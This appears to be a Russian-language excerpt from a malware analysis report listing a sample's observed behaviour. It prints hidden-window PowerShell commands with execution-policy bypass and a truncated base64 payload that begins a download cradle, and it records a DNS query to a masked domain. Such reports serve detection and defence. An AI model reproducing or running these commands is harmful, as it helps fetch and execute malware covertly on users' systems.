Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EX bypaSS -NoP -w hiddEN -Ec CQAgAAkAKAAJAAkAIAAmACgARwBFAHQALQBjAE8ATQBNAEEAbgBEACAAKgBXAC0ATwAqACkAIAAgACAATgBFAFQALgBXAGUAYgBDAGwAaQBFAG4AdAAJACAAIAApAC4AZABPAHcATgBsAE8AQQBkAEYAaQBsA...
- DNS ASK yo####m.yonpf.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EX bypaSS -NoP -w hiddEN -Ec CQAgAAkAKAAJAAkAIAAmACgARwBFAHQALQBjAE8ATQBNAEEAbgBEACAAKgBXAC0ATwAqACkAIAAgACAATgBFAFQALgBXAGUAYgBDAGwAaQBFAG4AdAAJACAAIAApAC4AZABPAHcATgBsAE8AQQBkAEYAaQBsA...' (со скрытым окном)